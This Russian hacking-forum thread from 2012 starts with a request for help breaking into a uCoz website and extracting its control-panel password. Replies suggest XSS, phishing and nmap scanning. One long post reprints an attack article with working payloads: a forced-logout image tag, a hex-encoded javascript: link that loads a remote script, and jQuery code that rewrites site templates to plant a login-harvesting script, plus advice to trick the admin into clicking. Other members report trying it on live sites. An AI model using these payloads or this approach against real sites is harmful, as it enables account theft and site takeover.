ucoz что можно сделать

Discussion in 'Веб-уязвимости' started by dimkaa123, 20 Oct 2012.

  1. dimkaa123

    dimkaa123 New Member

    Joined:
    19 Oct 2012
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Что можно сделать с сайтом на Ucoz, просто у меня его украли, а я как то вернуть хочу. Даже домен у меня остался. Есть какие то уязвимости у такого сайта? может как то можно пароль от ПУ и ответ на секретку вытащить, узнать. Или как по другому?
     
  2. Zed0x

    Zed0x Member

    Joined:
    4 Jun 2012
    Messages:
    114
    Likes Received:
    29
    Reputations:
    23
    Давай на чистоту, я думаю, что ты хочешь ломануть НЕ свой сайт. Во-вторых, подумай головой, как думаешь если бы в ucoz была уязвимость, то она бы распространялось на один сайт или на всю систему?
     
  3. GoodGoogle

    GoodGoogle Moderator

    Joined:
    5 Aug 2011
    Messages:
    1,148
    Likes Received:
    332
    Reputations:
    225
    XSS, его вроде до сих пор не залатали.... Была темка когда то на античате, но я ее удалил) по просьбе одного человека.
     
  4. seozone

    seozone Member

    Joined:
    11 Sep 2012
    Messages:
    46
    Likes Received:
    7
    Reputations:
    0
    на ucoz нет поддержки php, только html там багов нету кроме xss
     
  5. OxoTnik

    OxoTnik На мышей

    Joined:
    10 Jun 2011
    Messages:
    980
    Likes Received:
    525
    Reputations:
    173
    XSS вам ничего не даст, да она там есть, только куки хранятся на сторонних серверах
     
  6. seozone

    seozone Member

    Joined:
    11 Sep 2012
    Messages:
    46
    Likes Received:
    7
    Reputations:
    0
    попробуй фейком угнать
     
  7. Саранча

    Joined:
    30 May 2011
    Messages:
    9
    Likes Received:
    1
    Reputations:
    -5
    XSS Попробуй.
     
  8. mod_

    mod_ New Member

    Joined:
    6 Oct 2012
    Messages:
    13
    Likes Received:
    0
    Reputations:
    0
    если хтмл отключон то врядли ты его угонишь.скорее даже наверняка ниче не сможешь сделать.если он действительно твой то пиши в суппорт юкоза.побольше инфы им предоставь.поверят-может проверят-может вернут.и вообще не понятно.сайт у тебя угнали а профиль unet тоже чтоли?или у тебя его и небыло.насколько мне известно,то сайты на юкозе именно через этот профиль создвются.покрайней мере я именно через него управлял своими.или ты чета не договариваешь или я чета не понимаю
     
  9. mod_

    mod_ New Member

    Joined:
    6 Oct 2012
    Messages:
    13
    Likes Received:
    0
    Reputations:
    0
    толку от хсс не будет.активных там нет.а пассивных смысл?даже если и придут куки то херли толку.ниче он с ними сделать не сможет.ибо на юкозе у одмина привязка по йп по умолчанию стоит.

    Я даже сомневаюсь что ему удастся впарить ссыль челу который якобы угнал его сайт.я даже уверен в этом
     
  10. Pirotexnik

    Pirotexnik Banned

    Joined:
    13 Oct 2010
    Messages:
    365
    Likes Received:
    68
    Reputations:
    38
    Как-то раз знакомый хекал сервер юкозовский. Причем там был паблик баг. Так что пройдись nmaр-ом на всякий случай.
     
  11. WendM

    WendM Member

    Joined:
    29 Jan 2012
    Messages:
    44
    Likes Received:
    7
    Reputations:
    3
    Существует такая система для клепания сайтов под названием uCoz. Пользуются ей в основном те, кто не знаком с такими окуенно сложными вещами как Joomla, DLE и пр. — школота. Но прогуливаясь по просторам интернета часто натыкаешься на эти чудо-сайты. И иногда просто хочется взять и развидеть это го*но. Собственно пару способов это сделать можно узнать под катом.

    Первая уязвимость: BB код
    Сама уязвимость заключается в возможности «подгрузки» не картинки, а чего-нибудь другого. К примеру страницы выхода из аккаунта, которая располагается по адресу адрес_сайта/index/10:[CODE][I M G]http://адрес_сайта/index/10?.jpg[/I M G][/CODE] Кидаем себе в подпись или, что лучше, кидаем в чат и наслаждаемся зрелищем. Кучка школьников наверняка где-то пробует войти в свой профиль, тут же выходит из него и ловит окуенные баттхёрты ^__^.

    Вторая уязвимость: BB код [U R L]
    Учитывая, что на козе хостятся более миллиона сайтов смешной является уязвимость, которая даёт возможность использовать псевдопротокол «javascript:». Что смешно, не проверяется даже является ли строка ссылкой вообще >_<. И так, значит пытаемся вставить наш мего вредоносный скрипт на сайт:[CODE][U R L=javascript:alert('КулХАцкер!')]Не нажимать.[/U R L][/CODE]
    и хер, ибо кавычки и скобки всё-таки фильтруются. Заменяем HEX аналогами:[CODE][U R L=javascript:alert%28%27КулХацкер!%27%29]Не нажимать[/U R L][/CODE] и всё работает. Для надёжности заменяется весь скрипт HEX аналогами. Таким образом можно запускать произвольный JS код на сайте-жертве. К примеру так:[CODE][U R L=javascript:%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%73%63%72%69%70%74%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%74%65%73%74%2E%63%6F%6D%2F%62%61%64%2E%6A%73%22%3E%3C%2F%73%63%72%69%70%74%3E%27%29%3B]Не нажимать.[/U R L][/CODE] Или в читаемом виде[CODE][U R L=javascript:document.write('<script src="http://test.com/bad.js"></script>');]Не нажимать[/U R L][/CODE] Собственно, а как это использовать?

    Используя jQuery конструкции вида[CODE]/*Получаем исходник шаблона страницы*/
    $.get('/tmpls/?a=tmpl;m=3;t=3', function (o) {
    /*Делаем POST запрос с новыми параметрами*/
    $.post('/tmpls/', {
    //как угодно изменяем шаблон до этой функции или прямо тут через регэкспы
    //а далее подставляем нужные параметры
    tmpl: $('textarea[name="tmpl"]', o).val(),
    a: 'tmpl',
    t: '3',
    m: '3',
    tt: '1',
    ssid: $('input[name="ssid"]', o).val()
    });
    });
    /*Вообщем обычные GET и POST запросы с нужными вам параметрами*/[/CODE] у вас есть также возможность удалённо с помощью скрипта, который вы внедрите, изменять шаблоны различных страниц сайта. Это, можно считать, отдельная уязвимость. Так вот, вы можете внедрить в любой шаблон скрипт по отправке полей «имя» и «пароль» по нажатию на кнопку «вход». Для этого киньте админу в личку скрипт, для установки скрипта, собирающего пароли на сайт. Подождите пока он нажмёт на ссылку. И собирайте логины. Уже через логины можно получить доступ к сайтам на укозе конкретных пользователей, а также к другим (возможно) сайтам на которых пользователь зареген через их почту.

    В тегах U R L и I M G убрать пробелы.
    Автор статьи : TickHack
     
  12. mod_

    mod_ New Member

    Joined:
    6 Oct 2012
    Messages:
    13
    Likes Received:
    0
    Reputations:
    0
    щас проверим в топе юкоза)
     
  13. WendM

    WendM Member

    Joined:
    29 Jan 2012
    Messages:
    44
    Likes Received:
    7
    Reputations:
    3
    отпиши о результате. тоже интересно)
     
  14. mod_

    mod_ New Member

    Joined:
    6 Oct 2012
    Messages:
    13
    Likes Received:
    0
    Reputations:
    0
    да.в каком году интересно эта статья писалась
     
  15. mod_

    mod_ New Member

    Joined:
    6 Oct 2012
    Messages:
    13
    Likes Received:
    0
    Reputations:
    0
    пока только про чат могу сказать конкретно.при попытке вставить туда вв коды [урл] и [имг] выскакивает окошко.обнаруженны запрещенные ввкоды ([имг] или [урл]) на паре сайтов пробовал.одно и тоже.где прокатит не стал искать.сайтов дохрена)
    +не на всех сайтах чат стоит
     
  16. DasTem

    DasTem New Member

    Joined:
    6 Oct 2012
    Messages:
    37
    Likes Received:
    1
    Reputations:
    0
    а какая там XSS??
     
  17. Logan22

    Logan22 Member

    Joined:
    11 Sep 2009
    Messages:
    114
    Likes Received:
    17
    Reputations:
    0
    У меня прокатило, но как не старался что и теги имг как и теги урл получались как будто они простой текст.
    Ошибки быть не может. Бага уже такого нету
     
Loading...